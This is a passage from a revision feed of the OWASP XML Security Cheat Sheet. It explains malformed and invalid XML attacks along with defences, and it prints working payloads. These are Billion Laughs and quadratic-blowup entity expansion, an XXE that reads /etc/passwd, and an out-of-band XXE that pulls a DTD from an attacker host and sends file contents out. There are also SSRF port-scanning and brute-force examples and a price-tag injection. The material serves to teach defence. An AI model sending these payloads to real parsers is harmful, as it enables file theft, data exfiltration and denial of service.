The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224429</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224429"/>
				<updated>2016-12-21T20:17:04Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
